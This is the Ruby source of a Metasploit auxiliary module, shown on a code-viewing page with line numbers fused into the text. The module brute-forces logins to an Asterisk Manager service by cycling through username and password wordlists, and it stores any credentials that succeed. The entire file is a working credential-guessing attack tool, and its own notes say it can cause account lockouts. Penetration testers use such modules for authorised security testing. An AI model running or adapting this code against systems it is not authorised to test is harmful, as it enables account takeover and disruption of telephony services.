Path: blob/master/modules/auxiliary/voip/asterisk_login.rb
19593 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Scanner8include Msf::Auxiliary::Report9include Msf::Auxiliary::AuthBrute1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Asterisk Manager Login Utility',16'Description' => %q{17This module attempts to authenticate to an Asterisk Manager service. Please note18that by default, Asterisk Call Management (port 5038) only listens locally, but19this can be manually configured in file /etc/asterisk/manager.conf by the admin20on the victim machine.21},22'Author' => [23'dflah_ <dflah[at]alligatorteam.org>',24],25'References' => [26['URL', 'http://www.asterisk.org/astdocs/node201.html'], # Docs for AMI27],28'License' => MSF_LICENSE,29'Notes' => {30'Stability' => [CRASH_SAFE],31'SideEffects' => [ACCOUNT_LOCKOUTS],32'Reliability' => []33}34)35)3637register_options(38[39Opt::RPORT(5038),40OptString.new('USER_FILE',41[42false,43'The file that contains a list of probable users accounts.',44File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt')45]),4647OptString.new('PASS_FILE',48[49false,50'The file that contains a list of probable passwords.',51File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')52])53]54)55end5657def report_cred(opts)58service_data = {59address: opts[:ip],60port: opts[:port],61service_name: 'asterisk_manager',62protocol: 'tcp',63workspace_id: myworkspace_id64}6566credential_data = {67origin_type: :service,68module_fullname: fullname,69username: opts[:user],70private_data: opts[:password],71private_type: :password72}.merge(service_data)7374login_data = {75last_attempted_at: DateTime.now,76core: create_credential(credential_data),77status: Metasploit::Model::Login::Status::SUCCESSFUL,78proof: opts[:proof]79}.merge(service_data)8081create_credential_login(login_data)82end8384def run_host(_ip)85print_status('Initializing module...')86each_user_pass do |user, pass|87do_login(user, pass)88end89rescue ::Rex::ConnectionError => e90vprint_error("#{e.class}: #{e.message}")91rescue StandardError => e92elog("Asterisk login attempt failed", error: e)93vprint_error("#{e.class}: #{e.message}")94end9596def send_manager(command = '')97@result = ''98if !@connected99connect100@connected = true101select(nil, nil, nil, 0.4)102end103sock.put(command)104@result = sock.get_once || ''105rescue StandardError => e106print_error("Error: #{e}")107end108109def do_login(user = '', pass = '')110@connected = false111send_manager(nil) # connect only112113if @result !~ /^Asterisk Call Manager(.*)/114print_error('Asterisk Manager does not appear to be running')115return :abort116end117118vprint_status("#{rhost}:#{rport} - Trying user:'#{user}' with password:'#{pass}'")119cmd = "Action: Login\r\nUsername: #{user}\r\nSecret: #{pass}\r\n\r\n"120send_manager(cmd)121122if /Response: Success/.match(@result)123print_good("User: \"#{user}\" using pass: \"#{pass}\" - can login on #{rhost}:#{rport}!")124report_cred(ip: rhost, port: rport, user: user, password: pass, proof: @result)125disconnect126return :next_user127end128129disconnect130return :fail131rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e132vprint_error(e.message)133return :fail134rescue ::Timeout::Error, ::Errno::EPIPE => e135vprint_error(e.message)136return :fail137end138end139140141